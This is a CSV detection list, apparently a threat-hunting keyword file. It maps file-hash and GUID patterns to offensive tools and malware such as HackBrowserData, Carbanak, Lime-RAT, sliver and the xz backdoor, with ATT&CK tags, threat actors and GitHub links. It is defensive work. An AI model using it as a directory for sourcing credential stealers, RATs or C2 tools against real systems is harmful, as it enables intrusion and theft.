"*d42056fad9278acecf2a979acd6aa24bd1e757c8429a424b245dbc0a39bde9a2*",".{0,1000}d42056fad9278acecf2a979acd6aa24bd1e757c8429a424b245dbc0a39bde9a2.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","39646"
"*d42270ec9fee729c30fd5b96918170c896436b04b863a82d578beff5fd980a6c*",".{0,1000}d42270ec9fee729c30fd5b96918170c896436b04b863a82d578beff5fd980a6c.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#filehash","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","39647"
"*d423b1efdaf4f11171e6daf6e096e3651210cc454ccd6bb65ac07fd0aa0d7806*",".{0,1000}d423b1efdaf4f11171e6daf6e096e3651210cc454ccd6bb65ac07fd0aa0d7806.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39648"
"*d4254babd731bc584ca2e41f98f2f570b43ba92dcfbb0e0bee1cab109a5b096c*",".{0,1000}d4254babd731bc584ca2e41f98f2f570b43ba92dcfbb0e0bee1cab109a5b096c.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","39649"
"*d42f35102915099261b206a59fd3e7262af7a6d7f749f2236ba8b6d2349eec92*",".{0,1000}d42f35102915099261b206a59fd3e7262af7a6d7f749f2236ba8b6d2349eec92.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","39652"
"*d43660674a9329c64d5a7821c5bd2cdffdb572d95119a6dfee6684bb221bbfb1*",".{0,1000}d43660674a9329c64d5a7821c5bd2cdffdb572d95119a6dfee6684bb221bbfb1.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","39653"
"*d43a9a1559ceb6fa1906b0142c375b8d2fa52e3725df36ec795cb0e734e110ce*",".{0,1000}d43a9a1559ceb6fa1906b0142c375b8d2fa52e3725df36ec795cb0e734e110ce.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39654"
"*d43c57b216147ed60b4f3ba8a9e9543761492057788d64fef896e5075249630a*",".{0,1000}d43c57b216147ed60b4f3ba8a9e9543761492057788d64fef896e5075249630a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39655"
"*d43ceb0d2efb5fdee19d4f7b2448c7f69a6c5d24bfdfd21f5e0fce570fb47d79*",".{0,1000}d43ceb0d2efb5fdee19d4f7b2448c7f69a6c5d24bfdfd21f5e0fce570fb47d79.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","39656"
"*d43fc4c6e67a332b6abbb4b35186e9a20fa962c6aa4521f49b19f5bf372262d2*",".{0,1000}d43fc4c6e67a332b6abbb4b35186e9a20fa962c6aa4521f49b19f5bf372262d2.{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","0","#filehash","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","39657"
"*d44971afba15d74da67705ba5d44c7810be3b40baa11c25def44db606e6c8dfd*",".{0,1000}d44971afba15d74da67705ba5d44c7810be3b40baa11c25def44db606e6c8dfd.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39658"
"*d44bdc842118dc9ca7fb8d4d8c5a9e4bfb50f1e28daacdec3e4e6840dade446f*",".{0,1000}d44bdc842118dc9ca7fb8d4d8c5a9e4bfb50f1e28daacdec3e4e6840dade446f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39659"
"*d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3*",".{0,1000}d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","https://www.virustotal.com/gui/file/d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3","10","10","N/A","N/A","N/A","N/A","39660"
"*d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3*",".{0,1000}d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A","39661"
"*d44e7580049c7a6681402f1824d64a4bece941456bc3f1ee22fe5325b9644fb2*",".{0,1000}d44e7580049c7a6681402f1824d64a4bece941456bc3f1ee22fe5325b9644fb2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","39663"
"*d44f92ca48ad740a9ec34a5022ad904fbba74eba78b9b8a2a353c0ef4587e682*",".{0,1000}d44f92ca48ad740a9ec34a5022ad904fbba74eba78b9b8a2a353c0ef4587e682.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39664"
"*d4570fddbd3aaf219c1b905e6e5405e2d0222fb20ca5bf539c593b4ee4b0a66e*",".{0,1000}d4570fddbd3aaf219c1b905e6e5405e2d0222fb20ca5bf539c593b4ee4b0a66e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39666"
"*d4579c7cf34a278d9c70fdafa36ca0ed47c8c7a93c876901862fe3ecfdede336*",".{0,1000}d4579c7cf34a278d9c70fdafa36ca0ed47c8c7a93c876901862fe3ecfdede336.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39667"
"*d459f80368ae7be9d0cbd41ecd25571a25b1b3cff3e0280ee9928321d948f689*",".{0,1000}d459f80368ae7be9d0cbd41ecd25571a25b1b3cff3e0280ee9928321d948f689.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","39670"
"*d46ed22a1d5e5224bf6a5709526d8ba4cd8fdfc6332199d80d0d8aa9d0d725e2*",".{0,1000}d46ed22a1d5e5224bf6a5709526d8ba4cd8fdfc6332199d80d0d8aa9d0d725e2.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","39671"
"*d470da028679ca8038b062f9f629d89a994c79d1afc4862104611bb36326d0c8*",".{0,1000}d470da028679ca8038b062f9f629d89a994c79d1afc4862104611bb36326d0c8.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","39672"
"*D47C706B-152F-46B5-840A-4EBB2CFAFE33*",".{0,1000}D47C706B\-152F\-46B5\-840A\-4EBB2CFAFE33.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","39673"
"*d47de6d27a14f81c4764dea52fdd5f049971d3d0b91cff3d30621728f7c01a92*",".{0,1000}d47de6d27a14f81c4764dea52fdd5f049971d3d0b91cff3d30621728f7c01a92.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39674"
"*d4915417cd9c0127ed93470e8d07076540b1c7ac08162831d74ce2114fd7f209*",".{0,1000}d4915417cd9c0127ed93470e8d07076540b1c7ac08162831d74ce2114fd7f209.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39676"
"*d494a4bc-3867-436a-93ef-737f9e0522eb*",".{0,1000}d494a4bc\-3867\-436a\-93ef\-737f9e0522eb.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","#GUIDproject","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","39677"
"*d4962bf59508b527bd83622e1f05a95e3f26f2d7583052744e3d8dcdd08c4556*",".{0,1000}d4962bf59508b527bd83622e1f05a95e3f26f2d7583052744e3d8dcdd08c4556.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","39678"
"*d49db978a24cbafd9e310593896fb6df6b9360170ca1d80ce99231e02848df6c*",".{0,1000}d49db978a24cbafd9e310593896fb6df6b9360170ca1d80ce99231e02848df6c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","39679"
"*d4aa407ad94b69ed29090fe836f7c9c9d758cef377fe4d9df209135f98165341*",".{0,1000}d4aa407ad94b69ed29090fe836f7c9c9d758cef377fe4d9df209135f98165341.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","39682"
"*d4aae162571f8338f2560eb32b774647fd0f1952d901dd38f8685e42ceeea813*",".{0,1000}d4aae162571f8338f2560eb32b774647fd0f1952d901dd38f8685e42ceeea813.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","#filehash","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","39684"
"*d4ba2464d2d3450db40ac57c7e0d6d7a7e4ac72c44cbd6ce9e4b3366f3a8907b*",".{0,1000}d4ba2464d2d3450db40ac57c7e0d6d7a7e4ac72c44cbd6ce9e4b3366f3a8907b.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","#filehash","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","39689"
"*d4ba62aaa1120d8a12463700e71ac099083c7c4c4a38ac77af15c2d5c3737673*",".{0,1000}d4ba62aaa1120d8a12463700e71ac099083c7c4c4a38ac77af15c2d5c3737673.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39690"
"*d4bb1f16adc4ec3db363c0fd9c54268843af2654287173e23c9daf6ebf5f671d*",".{0,1000}d4bb1f16adc4ec3db363c0fd9c54268843af2654287173e23c9daf6ebf5f671d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39691"
"*d4bc21da22b767a22840c442dd56536e0e5ab05932aa82899a43c29d49352932*",".{0,1000}d4bc21da22b767a22840c442dd56536e0e5ab05932aa82899a43c29d49352932.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","39692"
"*d4c38a6655fc0b8d8099d46fa13442101085a999199baaa0440068f2d3b982e0*",".{0,1000}d4c38a6655fc0b8d8099d46fa13442101085a999199baaa0440068f2d3b982e0.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39694"
"*D4C4772E4D0E458214204795B306E71E67AB3554547CE06DDDC180219E5F4C3D*",".{0,1000}D4C4772E4D0E458214204795B306E71E67AB3554547CE06DDDC180219E5F4C3D.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","39695"
"*d4cfe09288719470c75a0e7b7054dd567d3255d1a331926ef8d5c91ea692a3d0*",".{0,1000}d4cfe09288719470c75a0e7b7054dd567d3255d1a331926ef8d5c91ea692a3d0.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","39696"
"*d4d156e6c11c5f257643a6cebfebcbc7c06b93bec236112ecd7df8e82f63846a*",".{0,1000}d4d156e6c11c5f257643a6cebfebcbc7c06b93bec236112ecd7df8e82f63846a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39697"
"*d4d2f64500f4ef36f7ee8bd2f7b580e143f811d67e8d9b60b680f4fca04a15a8*",".{0,1000}d4d2f64500f4ef36f7ee8bd2f7b580e143f811d67e8d9b60b680f4fca04a15a8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39698"
"*d4d82865304b28c413e0127789f79a4dc49a498782f840b3e2421e8429c66391*",".{0,1000}d4d82865304b28c413e0127789f79a4dc49a498782f840b3e2421e8429c66391.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39699"
"*d4deb85a5856036a50fc97fd185a545ec437604a64c0c0f7dfe9b7c81265558c*",".{0,1000}d4deb85a5856036a50fc97fd185a545ec437604a64c0c0f7dfe9b7c81265558c.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","39700"
"*d4dedef47f4a8c940f6455c170ac17778e558a888167e64ebc15ae44b27b90da*",".{0,1000}d4dedef47f4a8c940f6455c170ac17778e558a888167e64ebc15ae44b27b90da.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","39701"
"*d4e30598f12b58bb8f2df1b7899cfe35435e183517b941b721b1a70806808638*",".{0,1000}d4e30598f12b58bb8f2df1b7899cfe35435e183517b941b721b1a70806808638.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39702"
"*d4e30d80e0d2e1884270c75a2d13df486b54d0622925daaffa7ec78c942e3d45*",".{0,1000}d4e30d80e0d2e1884270c75a2d13df486b54d0622925daaffa7ec78c942e3d45.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39703"
"*d4e5da3ad9dcf854a1d6d71805fcaf8d418cbb3c7916d85ae641d88a745c23e8*",".{0,1000}d4e5da3ad9dcf854a1d6d71805fcaf8d418cbb3c7916d85ae641d88a745c23e8.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","39704"
"*d4f8316d0dd8355a0b857cae8f6fd0a6b3edb3603dc154d30b3aefcc8530baad*",".{0,1000}d4f8316d0dd8355a0b857cae8f6fd0a6b3edb3603dc154d30b3aefcc8530baad.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#filehash","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","39705"
"*D4stiny/ForkPlayground*",".{0,1000}D4stiny\/ForkPlayground.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","39706"
